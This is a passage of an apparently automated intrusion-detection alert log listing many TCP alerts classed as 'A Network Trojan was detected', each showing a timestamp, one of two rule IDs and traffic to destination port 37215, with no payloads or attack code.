          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988946
          SID:2835222
          Source Port:34686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539880
          SID:2829579
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946517
          SID:2835222
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560559
          SID:2829579
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285426
          SID:2835222
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399077
          SID:2835222
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713434
          SID:2835222
          Source Port:57586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595249
          SID:2835222
          Source Port:59336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893121
          SID:2835222
          Source Port:50838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724276
          SID:2829579
          Source Port:47224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994729
          SID:2835222
          Source Port:52068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078852
          SID:2829579
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274294
          SID:2829579
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603724
          SID:2835222
          Source Port:49056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014934
          SID:2829579
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168101
          SID:2829579
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286670
          SID:2829579
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418214
          SID:2829579
          Source Port:45392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284190
          SID:2829579
          Source Port:55616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2829579
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292582
          SID:2835222
          Source Port:60026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224228
          SID:2829579
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643775
          SID:2835222
          Source Port:41168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166741
          SID:2835222
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821339
          SID:2829579
          Source Port:43478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475812
          SID:2835222
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865945
          SID:2835222
          Source Port:45120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560491
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156013
          SID:2835222
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291750
          SID:2835222
          Source Port:56122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821627
          SID:2835222
          Source Port:52578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079514
          SID:2829579
          Source Port:32806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397323
          SID:2835222
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603496
          SID:2829579
          Source Port:33608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717869
          SID:2835222
          Source Port:45604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078646
          SID:2829579
          Source Port:49406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822855
          SID:2835222
          Source Port:33100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010665
          SID:2829579
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017571
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567497
          SID:2829579
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818245
          SID:2829579
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294883
          SID:2829579
          Source Port:38902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038028
          SID:2829579
          Source Port:33118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129430
          SID:2835222
          Source Port:53828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075556
          SID:2829579
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247171
          SID:2829579
          Source Port:32908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564257
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820910
          SID:2835222
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987152
          SID:2835222
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162574
          SID:2835222
          Source Port:60114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206855
          SID:2835222
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869088
          SID:2835222
          Source Port:34230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923129
          SID:2835222
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225211
          SID:2829579
          Source Port:42182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490242
          SID:2835222
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713083
          SID:2829579
          Source Port:35706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158096
          SID:2835222
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712991
          SID:2835222
          Source Port:37932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715566
          SID:2835222
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718895
          SID:2829579
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538015
          SID:2835222
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538552
          SID:2829579
          Source Port:49954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164638
          SID:2829579
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282470
          SID:2835222
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205306
          SID:2829579
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948432
          SID:2835222
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691986
          SID:2829579
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987550
          SID:2835222
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.040537
          SID:2835222
          Source Port:57126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480648
          SID:2829579
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718005
          SID:2835222
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415138
          SID:2829579
          Source Port:43108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284918
          SID:2829579
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720905
          SID:2835222
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414750
          SID:2835222
          Source Port:41736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028893
          SID:2829579
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399617
          SID:2829579
          Source Port:41150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278914
          SID:2835222
          Source Port:48882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272085
          SID:2835222
          Source Port:37240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250929
          SID:2835222
          Source Port:40716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917977
          SID:2835222
          Source Port:57878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952230
          SID:2835222
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945454
          SID:2829579
          Source Port:37362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030429
          SID:2835222
          Source Port:47958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027802
          SID:2829579
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716243
          SID:2835222
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206206
          SID:2829579
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539127
          SID:2835222
          Source Port:35544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312765
          SID:2829579
          Source Port:53016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287207
          SID:2829579
          Source Port:45386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161386
          SID:2835222
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034168
          SID:2835222
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721152
          SID:2829579
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986283
          SID:2829579
          Source Port:51360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597435
          SID:2835222
          Source Port:53090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167306
          SID:2829579
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718133
          SID:2829579
          Source Port:36326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719041
          SID:2835222
          Source Port:35444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411746
          SID:2835222
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598110
          SID:2829579
          Source Port:37434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084548
          SID:2829579
          Source Port:41464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819270
          SID:2835222
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163139
          SID:2829579
          Source Port:46666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466974
          SID:2835222
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417579
          SID:2829579
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715820
          SID:2829579
          Source Port:42112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603634
          SID:2835222
          Source Port:37076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538711
          SID:2829579
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721509
          SID:2829579
          Source Port:39372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818525
          SID:2835222
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289878
          SID:2835222
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.953591
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291429
          SID:2829579
          Source Port:51108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160382
          SID:2835222
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667514
          SID:2829579
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029267
          SID:2835222
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274314
          SID:2835222
          Source Port:43844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074503
          SID:2829579
          Source Port:57492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080130
          SID:2829579
          Source Port:43072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244837
          SID:2835222
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917937
          SID:2829579
          Source Port:43190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474521
          SID:2835222
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868945
          SID:2835222
          Source Port:33076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984213
          SID:2829579
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713445
          SID:2829579
          Source Port:59204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028871
          SID:2829579
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274678
          SID:2829579
          Source Port:35306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418177
          SID:2829579
          Source Port:33250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038310
          SID:2835222
          Source Port:50106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602523
          SID:2835222
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822166
          SID:2829579
          Source Port:51884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919189
          SID:2835222
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398470
          SID:2829579
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645542
          SID:2835222
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868834
          SID:2829579
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301339
          SID:2829579
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868962
          SID:2829579
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466228
          SID:2829579
          Source Port:60182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035374
          SID:2829579
          Source Port:47954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538238
          SID:2829579
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416076
          SID:2829579
          Source Port:56902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417479
          SID:2829579
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560402
          SID:2829579
          Source Port:39928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164939
          SID:2835222
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225029
          SID:2835222
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720930
          SID:2829579
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165674
          SID:2829579
          Source Port:54950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929667
          SID:2835222
          Source Port:45710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034774
          SID:2829579
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569281
          SID:2835222
          Source Port:48762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159241
          SID:2829579
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558025
          SID:2835222
          Source Port:57034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948478
          SID:2829579
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167063
          SID:2835222
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227696
          SID:2835222
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643264
          SID:2835222
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168170
          SID:2835222
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931395
          SID:2829579
          Source Port:54674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418605
          SID:2829579
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718019
          SID:2835222
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667785
          SID:2829579
          Source Port:35232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031702
          SID:2829579
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922087
          SID:2829579
          Source Port:43512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605598
          SID:2829579
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230855
          SID:2829579
          Source Port:36298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413038
          SID:2835222
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399031
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995715
          SID:2835222
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921944
          SID:2829579
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033419
          SID:2835222
          Source Port:42190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418393
          SID:2829579
          Source Port:50570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910491
          SID:2829579
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010761
          SID:2835222
          Source Port:34884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396140
          SID:2835222
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290189
          SID:2829579
          Source Port:36558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034833
          SID:2835222
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721047
          SID:2835222
          Source Port:49634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945438
          SID:2835222
          Source Port:34402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206132
          SID:2835222
          Source Port:32926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561972
          SID:2835222
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713696
          SID:2829579
          Source Port:53400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864283
          SID:2829579
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268430
          SID:2835222
          Source Port:45308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558796
          SID:2829579
          Source Port:33684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820467
          SID:2829579
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038044
          SID:2829579
          Source Port:34752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944684
          SID:2835222
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946698
          SID:2835222
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930394
          SID:2835222
          Source Port:48442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929949
          SID:2829579
          Source Port:33948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287340
          SID:2829579
          Source Port:48254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164154
          SID:2835222
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917080
          SID:2835222
          Source Port:38166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253134
          SID:2835222
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947049
          SID:2829579
          Source Port:49920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306117
          SID:2835222
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080543
          SID:2835222
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
